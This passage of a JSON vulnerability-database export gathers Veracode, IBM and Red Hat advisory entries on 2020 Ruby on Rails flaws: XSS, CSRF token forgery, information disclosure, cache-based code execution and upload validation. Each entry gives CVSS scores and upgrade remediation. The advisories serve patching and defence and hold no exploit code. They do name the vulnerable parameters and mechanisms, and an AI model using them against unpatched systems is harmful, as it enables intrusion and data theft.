"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2021-02-19T07:21:15", "id": "3B6A3B39-6E6B-5E2D-8FA8-D34732708B4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "veracode": [{"lastseen": "2023-04-18T12:44:18", "description": "actionview is vulnerable to cross-site scripting (XSS). A remote attacker is able to inject and execute arbitrary Javascript in a user's browser via the `t` and `translate` parameters,\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-14T02:56:27", "type": "veracode", "title": "Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-12-09T01:34:04", "id": "VERACODE:26739", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-26739/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-18T12:47:58", "description": "actionpack is vulnerable to cross-site request forgery (CSRF). In the event that the global CSRF token, such as the meta tag in the authenticity_token, is obtained, an attacker is able to forge per-form CSRF tokens for any action in a session, allowing for CSRF attacks.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-05-19T05:44:09", "type": "veracode", "title": "Cross-Site Request Forgery (CSRF)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2020-11-20T21:17:46", "id": "VERACODE:25451", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25451/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-18T12:34:06", "description": "actionpack is vulnerable to information disclosure. The vulnerability exists as the values of `each`, `each_value`, `each_pair`, returns the untrusted hash read from the strong parameter.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-19T05:17:26", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-09-30T21:05:37", "id": "VERACODE:25449", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25449/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-04-18T11:50:54", "description": "activesupport is vulnerable to arbitrary code execution. The vulnerability exists as the user input written to the cache store using the `raw: true` parameter can cause the cached code to be evaluated when read again.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-27T04:08:15", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-09-25T15:05:56", "id": "VERACODE:25499", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25499/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T12:34:11", "description": "activestorage allows unrestricted file uploads. The `Content-Length` in signature for ActiveStorage direct upload is not validated, allowing an attacker upload a file with an arbitrary file size or bypass controls in place on the server.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-19T07:08:51", "type": "veracode", "title": "Unrestricted File Upload", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2020-09-25T15:05:50", "id": "VERACODE:25453", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25453/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-18T12:47:57", "description": "@rails/ujs is vulnerable to cross-site request forgery (CSRF). The same-origin header in XMLHttpRequest requests are not validated before including the CSRF token, potentially allowing remote attackers to submit requests on behalf of the user.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-05-20T00:09:28", "type": "veracode", "title": "Cross-Site Request Forgery (CSRF)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8167"], "modified": "2020-09-25T15:05:58", "id": "VERACODE:25454", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25454/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ibm": [{"lastseen": "2023-02-27T21:48:09", "description": "## Summary\n\nA security vulnerability in Rails Action View affects the IBM Cloud Pak for Multicloud Management Infrastructure Management .\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-15169](<https://vulners.com/cve/CVE-2020-15169>) \n** DESCRIPTION: **Rails Action View is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the 't' and 'translate' parameters to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188186](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188186>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Infrastructure Management| 2.0 \n \n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.1 by following the instructions in <https://www.ibm.com/support/knowledgecenter/en/SSFC4F_2.1.0/install/upgrade.html>.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-12-14T18:39:49", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Rails Action View affects the IBM Cloud Pak for Multicloud Management Infrastructure Management", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-12-14T18:39:49", "id": "83F53A1D05170BCE5BFE0F61D6B8CDDCC22EADA48AC8EA91C7ABC907D33AA5A1", "href": "https://www.ibm.com/support/pages/node/6373016", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-27T21:50:22", "description": "## Summary\n\nThere is a vulnerability in Ruby On Rails that is used by IBM License Metric Tool.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-8166](<https://vulners.com/cve/CVE-2020-8166>) \n** DESCRIPTION: **Ruby on Rails is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by authenticity_token meta tag. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unintended actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/184553](<https://exchange.xforce.ibmcloud.com/vulnerabilities/184553>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM License Metric Tool| All \n \n \n \n\n\n \n\n\n## Remediation/Fixes\n\nUpgrade to version 9.2.21 or later using the following procedure: \n\nIn BigFix console, expand IBM License Reporting (ILMT) node under Sites node in the tree panel. \nClick Fixlets and Tasks node. Fixlets and Tasks panel will be displayed on the right. \nIn the Fixlets and Tasks panel locate Upgrade to the latest version of IBM License Metric Tool 9.x fixlet and run it against the computer that hosts your server.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-10-01T13:31:13", "type": "ibm", "title": "Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2020-8166).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2020-10-01T13:31:13", "id": "ECC9F68A7B7CDECDFC597F669D0D6D39FA9047BF0CDD8D2EF3C9BE9843D8E63B", "href": "https://www.ibm.com/support/pages/node/6340119", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-27T21:50:22", "description": "## Summary\n\nThere is a vulnerability in Ruby On Rails that is used by IBM License Metric Tool.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-8164](<https://vulners.com/cve/CVE-2020-8164>) \n** DESCRIPTION: **Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by the deserialization of untrusted data. By sending a specially crafted request, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183750](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183750>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM License Metric Tool| All \n \n \n \n\n\n \n\n\n## Remediation/Fixes\n\nUpgrade to version 9.2.21 or later using the following procedure: \n\nIn BigFix console, expand IBM License Reporting (ILMT) node under Sites node in the tree panel. \nClick Fixlets and Tasks node. Fixlets and Tasks panel will be displayed on the right. \nIn the Fixlets and Tasks panel locate Upgrade to the latest version of IBM License Metric Tool 9.x fixlet and run it against the computer that hosts your server.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-01T13:27:06", "type": "ibm", "title": "Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2020-8164).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-10-01T13:27:06", "id": "B9AC236DED8C5D19F13C6F7F060C1F2ECFB7D9164115370343018A74255E2481", "href": "https://www.ibm.com/support/pages/node/6340111", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-27T21:53:54", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Rails.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-8163](<https://vulners.com/cve/CVE-2020-8163>) \n** DESCRIPTION: **Rails could allow a remote attacker to execute arbitrary code on the system, caused by a code injection vulnerability. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/184567](<https://exchange.xforce.ibmcloud.com/vulnerabilities/184567>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-8185](<https://vulners.com/cve/CVE-2020-8185>) \n** DESCRIPTION: **Rails is vulnerable to a denial of service, caused by improper access control. By sending a specially crafted request, a remote attacker could exploit this vulnerability to run pending migrations in production. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/184564](<https://exchange.xforce.ibmcloud.com/vulnerabilities/184564>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2020-8166](<https://vulners.com/cve/CVE-2020-8166>) \n** DESCRIPTION: **Ruby on Rails is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by authenticity_token meta tag. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unintended actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/184553](<https://exchange.xforce.ibmcloud.com/vulnerabilities/184553>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nICP - Discovery| 2.0.0-2.1.2 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 2.1.3 \n \n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-18T06:08:42", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163", "CVE-2020-8166", "CVE-2020-8185"], "modified": "2020-07-18T06:08:42", "id": "8C90E11DB242E8DC044F905A8987B587D4A711080CE57EFC871310507AC8BF90", "href": "https://www.ibm.com/support/pages/node/6250723", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-09-06T05:55:16", "description": "A flaw was found in rubygem-actionview in versions prior to 5.2.4.4 and 6.0.3.3. When an HTML-unsafe string is passed as the default for a missing translation key, the default string is incorrectly marked as HTML-safe and not escaped. Thie highest threat from this vulnerability is to data confidentiality and integrity.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-09T21:27:05", "type": "redhatcve", "title": "CVE-2020-15169", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2023-08-31T15:57:19", "id": "RH:CVE-2020-15169", "href": "https://access.redhat.com/security/cve/cve-2020-15169", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-06T08:40:21", "description": "A flaw was found in rubygem-activestorage. The ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user. The highest threat from this vulnerability is to data integrity.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-02T14:53:24", "type": "redhatcve", "title": "CVE-2020-8162", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2023-08-31T16:06:27", "id": "RH:CVE-2020-8162", "href": "https://access.redhat.com/security/cve/cve-2020-8162", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-06T08:40:21", "description": "A flaw was found in rubygem-activesupport. An untrusted user input can be written to the cache store using the `raw: true` parameter which can lead to the result being evaluated as a marshaled object instead of plain text. The threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n#### Mitigation\n\nRed Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update as soon as possible. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-02T17:21:48", "type": "redhatcve", "title": "CVE-2020-8165", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2023-08-31T16:06:57", "id": "RH:CVE-2020-8165", "href": "https://access.redhat.com/security/cve/cve-2020-8165", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-06T08:40:20", "description": "A flaw was found in rubygem-actionpack. Forgery of a per-form CSRF token is possible allowing for any action to take place for that session. The highest threat from this vulnerability is to data integrity.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-06-02T17:53:07", "type": "redhatcve", "title": "CVE-2020-8166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2023-08-31T16:07:15", "id": "RH:CVE-2020-8166", "href": "https://access.redhat.com/security/cve/cve-2020-8166", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-06T08:40:00", "description": "A flaw was found in rubygem-actionpack. Untrusted hashes of data is possible for values of `each`, `each_value`, and `each_pair` which can lead to cases of user supplied information being leaked from Strong Parameters. Applications that use these hashes may inadvertently use untrusted user input. The highest risk from this vulnerability is to data confidentiality.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-01T18:20:13", "type": "redhatcve", "title": "CVE-2020-8164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 